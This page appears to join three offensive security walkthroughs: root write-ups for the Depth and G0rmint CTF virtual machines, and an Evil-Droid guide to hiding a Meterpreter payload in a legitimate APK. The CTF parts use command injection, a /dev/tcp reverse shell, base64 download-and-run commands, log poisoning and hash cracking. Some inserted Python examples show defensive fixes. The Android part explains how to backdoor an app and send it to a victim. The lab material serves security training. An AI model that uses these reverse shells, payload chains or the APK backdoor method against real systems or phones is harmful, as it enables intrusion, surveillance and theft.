Hack the Depth VM (CTF Challenge)


Today we are going to take on a simple boot2root style VM challenge “Depth:1” by ‘Dan Lawson’. Here we have to root the server to complete the challenge.
Download it from here: https://download.vulnhub.com/depth/DepthB2R.ova
Difficulty: Intermediate

Penetrating Methodology:

Scanning
  • Netdiscover
  • NMAP
Enumeration
  • Web Directory search
  • Credential harvesting
Exploiting
  • Disable firewall through ssh
  • Payload execution
Privilege Escalation
  • Exploit sudo rights
Capture the Flag

Walkthrough

Scanning

Let’s start off by scanning the network to identify the target’s IP. With the help of netdiscover we identify it as 192.168.1.101. Next, port enumeration with an nmap aggressive scan shows that port 8080 is open and running an HTTP service, Apache Tomcat/Coyote JSP engine 1.1.
netdiscover
nmap -A 192.168.1.101


Enumeration
We open the IP in the browser on port 8080. The page gives a bit of useful information, exposing the default Apache Tomcat directories.


Next, we enumerate files with the jsp extension on the target, using the -X parameter of dirb to set the extension. The Nikto result shows the same file, as you can see in the following screenshot:


Opening the file in the browser shows a file list checker script as a hint; it is supposed to list directories on the server upon request.


Upon submitting “ls -l /tmp” to the script, we can see that the users root and tomcat8 are there.


After trying a few more commands we get success with ‘ls -l /home’, as it shows us a user named bill.


Here we try to find the running processes with “ps aux”; the options “aux” print all running processes on the system regardless of where they were started from. We find that the sshd service is in use, but possibly with restricted access.


Exploiting
Let’s try to disable the firewall through ssh as user bill, and it gets executed.
ssh bill@localhost sudo ufw disable
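Everything above works because the list-checker hands its input to a shell unchanged. As an added example (not code from the original post or the VM, and written in Python rather than JSP), here is that pattern beside a hardened version that canonicalises the path, checks it against a constructed allowlist of base directories, and never invokes a shell.

```python
import os
import subprocess

# Constructed allowlist: the only directories the checker is meant to show.
ALLOWED_BASES = tuple(os.path.realpath(p) for p in ("/tmp", "/home"))


def list_dir_vulnerable(user_input):
    """The pattern behind the foothold: the request parameter is glued into a
    shell command, so "/tmp; ps aux" runs ps aux as the web user as well."""
    proc = subprocess.run("ls -l " + user_input, shell=True,
                          capture_output=True, text=True)
    return proc.stdout


def is_allowed(user_input):
    """Canonicalise (follows symlinks, collapses ../) and require the result to
    sit inside an allowlisted base. "/tmp; ps aux" is simply a path that is
    not under /tmp/, and since no shell is involved the ';' is harmless."""
    target = os.path.realpath(user_input)
    return any(target == base or target.startswith(base + os.sep)
               for base in ALLOWED_BASES)


def list_dir_hardened(user_input):
    """Same feature, no shell: validate, then read the directory directly."""
    if not is_allowed(user_input):
        raise ValueError("path outside the allowlist: %r" % user_input)
    target = os.path.realpath(user_input)
    if not os.path.isdir(target):
        raise ValueError("not a directory: %r" % user_input)
    with os.scandir(target) as entries:
        return sorted(entry.name for entry in entries)
```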




After that, to gain a reverse shell, we first set up our netcat listener on port 1234, which you can see in the last screenshot.
Then we use a bash reverse shell to gain access, connecting back to our host 192.168.1.110 on port 1234.
msfvenom -p cmd/unix/reverse_bash lhost=192.168.1.110 lport=1234 R


Copy the generated payload and execute it with ssh.
ssh bill@localhost 0<&46-;exec 46<>/dev/tcp/192.168.1.110/1234;sh <&46 >&46 2>&46




Privilege Escalation and capturing the flag
As soon as we execute the payload we get our reverse shell. Now we check the sudo rights for bill and find that he has all permissions and can use sudo without a password. Great! Now we just have to switch to root and go into the root folder, where we find a file called flag.
Lastly, we open the flag file and capture the flag.
nc -lvp 1234
sudo -l
sudo su
cd /root
ls
cat flag

Hack the G0rmint VM (CTF Challenge)

Hello friends! Today we are going to take another CTF challenge known as G0rmint. The credit for making this vm machine goes to “Noman Riffat” and it is another boot2root challenge where we have to root the server to complete the challenge. You can download this VM here.
Let’s Breach!!!
Let us start from getting to know the IP of the VM (here I have it at 192.168.1.134, but you will have to find your own).
netdiscover


Use nmap for port enumeration.
nmap 192.168.1.134


The nmap scan shows us port 80 is open, so we open the IP address in our browser.
We don’t find anything on the page, so we use dirb to find directories for more information.

dirb http://192.168.1.134/


We open robots.txt and find a directory called /g0rmint/.


When we open the directory we find a login page.


We take a look at the source code for more information.


In the source code we find a backup directory called s3cretbackupdirectory/. We use dirb to enumerate files or pages in that directory.


We find a page called info.php; when we open it we find a file named backup.zip.


We download the file for further information.


We extract the zip file and find that the file contains the source code for the webpage.


Now we take a look inside style.css and look at the name of the author.
cat style.css | grep Author


We use these details as the username and email for the password reset.


We now take a look at reset.php file.


We find that the new password is based on the time at which we reset the password. We create a PHP file that generates the password based on the time displayed on the page.


Now we generate the password using our php script.
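A password that depends only on a clock the user can see is a guess space, not a secret. The following is an added example, not the VM’s reset.php or the author’s script: the page does not reproduce the real formula, so `time_based_password` is a hypothetical stand-in, and it is shown beside a replacement that issues random, hashed-at-rest, single-use, expiring reset tokens.

```python
import hashlib
import hmac
import secrets
import time

TOKEN_TTL_SECONDS = 15 * 60


def time_based_password(epoch_seconds):
    """Hypothetical stand-in for a clock-derived reset password (the VM's
    actual formula is not on this page). Anyone who saw the time can replay it."""
    return hashlib.md5(str(epoch_seconds).encode()).hexdigest()[:12]


def candidate_passwords(displayed_epoch, window_seconds=60):
    """Guess space left to someone who read the displayed time: one candidate
    per second of clock uncertainty, i.e. about 6 bits for a one-minute window."""
    return {time_based_password(displayed_epoch + d) for d in range(window_seconds)}


def issue_reset_token(store, user, now=None):
    """Hardened replacement: 256 bits from the OS CSPRNG, stored only as a
    hash so a leaked database row does not reveal the token."""
    now = time.time() if now is None else now
    token = secrets.token_urlsafe(32)
    store[hashlib.sha256(token.encode()).hexdigest()] = (user, now + TOKEN_TTL_SECONDS)
    return token


def redeem_reset_token(store, token, now=None):
    """Return the user if the token is valid and unexpired; the token is
    consumed either way so it can never be replayed."""
    now = time.time() if now is None else now
    digest = hashlib.sha256(token.encode()).hexdigest()
    for stored_digest, (user, expires_at) in list(store.items()):
        if hmac.compare_digest(stored_digest, digest):  # constant-time compare
            del store[stored_digest]
            return user if now <= expires_at else None
    return None
```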


We go to the login page and use the email we found in the CSS file and the password we just generated to log in.


Now that we are authorized we take a look at the log file. In config.php we find that the logs are stored in the s3r3t-dir3ct0ry-f0r-l0gs/ directory, in files named in the format yy-mm-dd.php.


Now we use the current date to open the log file.


Now we upload a basic PHP shell through the email address field. We wrap the command in base64_decode so that we can bypass the input filter.


Now we convert our commands to base64, then use the encoded string to execute our command on the server.

When we execute our command the server runs it and we are able to see the files in that directory on the server.
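The poisoning works because a user-supplied field is written into a .php file under the web root. As an added example (not part of the original post), the detector below scans a constructed day’s log for PHP tags in the email field and decodes any base64-wrapped command so the analyst can read what was attempted; the line layout and the hardened log path are assumptions, since the page only gives the yy-mm-dd.php naming.

```python
import base64
import re
from datetime import date

# Constructed sample of one day's log; the line layout is an assumption, the
# page only tells us the file is named yy-mm-dd.php and records the email.
SAMPLE_LOG = """\
2017-11-12 10:01:02 | login failed | email=noman@example.test
2017-11-12 10:03:17 | login failed | email=<?php system(base64_decode($_GET['c'])); ?>
2017-11-12 10:04:40 | login failed | email=<?php echo base64_decode("aWQ="); ?>
2017-11-12 10:05:00 | login failed | email=bob@example.test
"""

PHP_TAG = re.compile(r"<\?(php|=)", re.IGNORECASE)
DANGEROUS = re.compile(
    r"\b(system|exec|shell_exec|passthru|eval|base64_decode)\s*\(", re.IGNORECASE)
B64_LITERAL = re.compile(r'base64_decode\(\s*["\']([A-Za-z0-9+/=]+)["\']')


def vulnerable_log_name(year, month, day):
    """What the VM does: a .php file under the web root, so any PHP tag written
    into it runs the moment the file is requested."""
    return date(year, month, day).strftime("%y-%m-%d") + ".php"


def hardened_log_name(year, month, day, root="/var/log/webapp"):
    """Fix: non-executable extension outside the document root (the root path
    is a constructed example); the email value should also be escaped on write."""
    return root + "/" + date(year, month, day).strftime("%y-%m-%d") + ".log"


def scan_log(text):
    """Flag entries whose email field carries PHP code; surface the dangerous
    calls used and the plaintext of any base64 literal handed to base64_decode."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        field = line.rsplit("email=", 1)[-1]
        if not PHP_TAG.search(field):
            continue
        calls = sorted({m.group(1).lower() for m in DANGEROUS.finditer(field)})
        decoded = [base64.b64decode(m.group(1)).decode("utf-8", "replace")
                   for m in B64_LITERAL.finditer(field)]
        findings.append({"line": lineno, "calls": calls, "decoded": decoded})
    return findings
```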


Now we create an ELF shell with msfvenom.
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.116 lport=4444 -f elf > /var/www/html/shell
To upload our shell, we convert our commands to base64.
echo 'wget http://192.168.1.116/shell; chmod +x shell; ./shell' | base64


Now we setup our listener using metasploit.
msf > use multi/handler
msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.116
msf exploit(handler) > set lport 4444
msf exploit(handler) > run

Now when we execute our command we get our reverse shell.


Going through the files in the /var/www folder we find a file called backup.zip. When we try to extract it we find that it can only be extracted into a tmp folder, so we extract the zip file into /var/tmp/.
unzip backup.zip -d /var/tmp


After extracting the zip file, we take a look inside the folder we extracted the files to and find a SQL file.


When we open the file we find the MD5 hash of the password for the user g0rmint.
cat /var/tmp/db.sql | grep noman


When we crack the MD5 hash we find the password ‘tayyab123’.


We use this to connect through ssh.
After connecting through ssh we use the same password to gain root access.
Once we have root access we go to the root folder, where we find a file called flag.txt. When we open the file we get a congratulatory message for completing the VM.

Android Mobile Exploitation with Evil-Droid

Hello friends! Today you will learn how to generate an APK payload with the help of “Evil-Droid”. It is a tool used to compromise an Android device from an attacker’s point of view; we are using it only for educational purposes.

Evil-Droid is a framework that creates, generates and embeds APK payloads to penetrate Android platforms.
Requirement:
Attacker: Kali Linux
Target: Android

Let’s Begin!!
Open the terminal in your Kali Linux and execute the command given below to download it from GitHub.

git clone https://github.com/M4sc3r4n0/Evil-Droid.git


Now open the downloaded folder in the terminal and type the command given below to give all permissions to the script “evil-droid”.
chmod 777 evil-droid


Now execute the command given below to run the script and launch the Evil-Droid application.
./evil-droid


When you execute the above command, Evil-Droid will start as shown in the image below. It begins by testing the internet connection and checking its dependencies against the available Kali Linux tools on its own.


Then a prompt will pop up to confirm the Evil-Droid framework requirements; here select the option “yes”.


Now the Evil-Droid framework opens, offering the options given below for attacking a remote Android platform.
[1] APK MSF
[2] BACKDOOR APK ORIGINAL (OLD)
[3] BACKDOOR APK ORIGINAL (NEW)
[4] BYPASS AV APK (ICON CHANGE)
[5] START LISTENER
[c] CLEAN
[q] QUIT
[?] Select

From the image below you can see that we chose the option “BACKDOOR APK ORIGINAL”.




After that another prompt will pop up to set the LPORT for the reverse connection, as shown in the image below.


In the next prompt, enter the name you want to give your APK payload, as shown in the image below. Here I gave my payload the name baidu-browser.


Here I selected “android/meterpreter/reverse_http” as the payload.


Now download any original APK file from Google in order to hide your payload in it. Here I downloaded baidu.apk to hide my baidu-browser payload inside it; you can download any other APK file of your choice.


This will now generate a malicious baidu.apk with our backdoor hidden inside it, as shown in the image below. Now copy this malicious APK from the path /root/Evil-Droid/evilapk/baidu-browser.apk and send it to the victim.


On the other hand, another prompt will pop up to choose one of the following options:
  • Multi-Handler
  • Attack-vector
  • Main menu
  • Exit

From the image below you can see that I chose “multi handler” for the reverse connection from the victim’s system.




Great!! From the image below you can observe that meterpreter session 1 is opened.
meterpreter > sysinfo